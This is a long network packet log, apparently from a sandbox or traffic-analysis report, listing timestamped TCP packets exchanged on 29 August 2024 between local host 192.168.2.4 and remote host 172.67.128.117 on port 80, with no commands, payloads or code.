                                  Aug 29, 2024 23:42:09.352627993 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352653027 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352788925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352801085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352809906 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352821112 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352832079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352833986 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352844954 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.352854013 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352876902 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.352890968 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.354809046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354868889 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.354904890 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354916096 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354932070 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354943991 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354952097 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.354955912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354969025 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.354969978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.354980946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355000019 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355016947 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355042934 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355370998 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355382919 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355392933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355422020 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355449915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355449915 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355463982 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355473995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355488062 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355496883 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355498075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355526924 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355540991 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355562925 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355575085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355581045 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355591059 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355616093 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355640888 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355658054 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355669022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355679035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355690956 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355700016 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355704069 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355715036 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355741978 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355775118 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355786085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355794907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355807066 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355817080 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355825901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355843067 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355855942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355866909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355871916 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355878115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355900049 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355916023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355931997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355942011 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355952024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355962992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355973959 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355976105 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.355984926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.355999947 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.356013060 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.356039047 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.356076002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.356087923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.356102943 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.356113911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.356121063 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.356127024 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.356141090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.356143951 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.356169939 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.356195927 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436348915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436429977 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436525106 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436537027 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436547995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436568975 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436575890 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436583996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436594963 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436606884 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436606884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436619997 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436630964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436639071 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436650038 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436662912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436667919 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436671972 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436686039 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.436698914 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436731100 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.436762094 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.437230110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.437274933 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.437299967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.437309980 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.437344074 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.437391996 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.437403917 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.437413931 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.437438965 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.437465906 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.437558889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.437575102 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.437608004 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.440428019 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440488100 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.440525055 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440536022 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440546036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440557003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440577984 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.440609932 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.440660000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440670967 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440682888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440691948 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440702915 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440713882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440716982 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.440726042 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440747023 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.440759897 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.440788031 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440799952 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440809965 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440821886 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440830946 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.440833092 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440845966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440850973 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.440859079 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440876961 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.440901995 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.440932035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440943003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440972090 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440973997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.440984964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.440996885 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441013098 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441046953 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441108942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441119909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441129923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441162109 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441185951 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441231012 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441241026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441251040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441263914 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441276073 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441276073 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441284895 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441291094 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441301107 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441334963 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441370964 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441386938 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441397905 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441409111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441420078 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441447020 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441517115 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441528082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441538095 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441550016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441561937 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441564083 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441574097 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441584110 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441585064 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441598892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441607952 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441612005 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441623926 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441633940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441636086 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.441657066 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441663980 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.441696882 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.443386078 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443396091 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443406105 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443417072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443450928 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443454027 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.443464041 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443475962 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443485975 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443490028 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.443511009 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.443536997 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.443820000 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443842888 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443852901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443865061 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.443881035 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443888903 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.443893909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443897009 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.443916082 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443922043 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.443943024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.443954945 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.443974018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443984032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443989992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.443998098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444021940 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444027901 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444040060 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444048882 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444048882 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444070101 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444098949 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444127083 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444138050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444148064 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444175005 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444188118 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444267988 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444278002 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444284916 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444289923 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444297075 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444309950 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444312096 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444331884 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444360018 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444538116 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444550037 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444581985 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444593906 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444658995 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444669008 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444674015 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444701910 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444720984 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444786072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444796085 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444806099 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444816113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444827080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444828987 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444839001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444844007 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444876909 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.444957018 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444967985 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444977999 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444988966 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.444999933 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.445002079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.445027113 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.445056915 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.524914026 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.524924040 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525001049 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525072098 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525088072 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525100946 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525118113 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525130033 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525140047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525151968 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525163889 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525176048 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525187016 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525222063 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525228024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525228024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525228024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525228024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525228024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525228024 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525233030 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525244951 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525247097 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525265932 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525285006 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525289059 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525331974 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525830984 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525847912 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525859118 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525868893 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525871992 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.525887012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525901079 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.525989056 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.526000977 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.526010036 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.526020050 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.526034117 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.526050091 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529074907 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529093981 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529108047 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529128075 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529149055 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529171944 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529182911 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529192924 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529203892 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529222012 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529247046 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529287100 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529299021 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529310942 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529321909 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529339075 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529349089 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529356003 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529380083 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529401064 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529436111 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529448032 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529458046 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529470921 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529483080 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529483080 CEST4973080192.168.2.4172.67.128.117
                                  Aug 29, 2024 23:42:09.529495001 CEST8049730172.67.128.117192.168.2.4
                                  Aug 29, 2024 23:42:09.529508114 CEST4973080192.168.2.4172.67.128.117
